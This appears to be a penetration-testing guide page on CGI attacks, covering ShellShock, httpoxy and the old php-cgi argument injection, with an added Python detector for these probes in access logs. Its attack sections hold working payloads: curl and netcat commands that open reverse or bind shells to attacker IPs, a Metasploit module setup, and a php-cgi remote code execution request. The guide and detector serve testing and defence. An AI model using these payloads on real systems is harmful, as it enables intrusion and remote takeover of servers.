tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Information

CGI scripts are commonly Perl scripts, so if you have compromised a server that can execute .cgi scripts you can upload a Perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), change the extension from .pl to .cgi, give it execute permissions (chmod +x) and access the reverse shell from the web browser to execute it. To test for CGI vulns it is recommended to use nikto -C all (and all the plugins).

ShellShock

ShellShock is a vulnerability that affects the widely used Bash command-line shell in Unix-based operating systems. It targets Bash's ability to run commands passed to it by applications. The vulnerability lies in the manipulation of environment variables, which are dynamic named values that affect how processes run on a computer. Attackers can exploit it by attaching malicious code to environment variables, which is executed when the variable is received. This allows attackers to potentially compromise the system.

In order to exploit this vulnerability the page could throw an error.

You can find this vulnerability by noticing that the server is running an old Apache version with cgi_mod (with a cgi folder) or by using nikto.

Test

Most tests are based on echoing something and expecting that string to be returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.

Nmap

```bash
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```

Curl (reflected, blind and out-of-band)

```bash
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band: use Cookie as an alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
```

Shellshocker

```bash
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```

Exploiting

```bash
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit (msfconsole)
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run
```

Proxy (MitM to Web server requests)

CGI creates an environment variable for each header in the HTTP request. For example: "Host: web.com" is created as "HTTP_HOST"="web.com".

Since the HTTP_PROXY variable could be used by the web server (the issue known as httpoxy), try sending a header containing: "Proxy: <IP_attacker>:<PORT>". If the server performs any request during the session, you will be able to capture each request made by the server.

Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Basically, if CGI is active and PHP is "old" (<5.3.12 / < 5.4.2) you can execute code. In order to exploit this vulnerability you need to access some PHP file of the web server without sending parameters (especially without sending the "=" character), because a query string with no "=" is passed to php-cgi as command-line arguments. Then, to test for this vulnerability, you could access for example /index.php?-s (note the -s) and the source code of the application will appear in the response.

Then, in order to get RCE you can send this special query: /?-d allow_url_include=1 -d auto_prepend_file=php://input with the PHP code to be executed in the body of the request. Example:

```bash
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
```

More info about the vuln and possible exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Writeup Example.
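From the defender's side, both the ShellShock probes in the Test section and the php-cgi argument injection above leave a distinctive trace in the web server's access log. The following detector is an added example (not HackTricks' own code, and not any named tool): it parses Apache combined-format lines (assumed format), flags the "() {" function-definition marker in the logged User-Agent, Referer or decoded URL, and flags query strings that contain no "=" but decode to something starting with "-". The sample log lines are constructed; note the combined format does not log the Cookie header, so a Cookie-based probe would need a custom LogFormat.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format (assumed): host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Every ShellShock payload must begin with a Bash function definition: "() {"
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample lines (not real traffic): a ShellShock probe, a php-cgi "-s"
# source disclosure probe, the "-d" RCE query from above, and one benign request.
SAMPLE_LOGS = [
    '10.1.2.3 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo VULNERABLE"',
    '10.1.2.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "curl/7.88.1"',
    '10.1.2.5 - - [10/Oct/2023:13:57:12 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 64 "-" "curl/7.88.1"',
    '10.1.2.6 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php?page=home HTTP/1.1" 200 4096 "http://example.test/" "Mozilla/5.0"',
]

def classify(line):
    """Return the list of finding tags for one combined-format access log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    parts = m.group("request").split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    # ShellShock: CGI copies request headers into environment variables, so the
    # "() {" marker in any logged header (or in the URL-decoded target) is suspicious.
    for field in (m.group("ua"), m.group("referer"), unquote_plus(target)):
        if SHELLSHOCK_RE.search(field):
            findings.append("shellshock")
            break
    # CVE-2012-1823: a query string with no '=' is handed to php-cgi as argv,
    # so a decoded query that starts with '-' is an option-injection attempt.
    _, _, query = target.partition("?")
    if query and "=" not in query and unquote_plus(query).lstrip().startswith("-"):
        findings.append("php-cgi-argv")
    return findings

def scan(lines):
    """Return (client_ip, request, findings) for every parsed line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        findings = classify(line)
        if m and findings:
            hits.append((m.group("ip"), m.group("request"), findings))
    return hits
```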
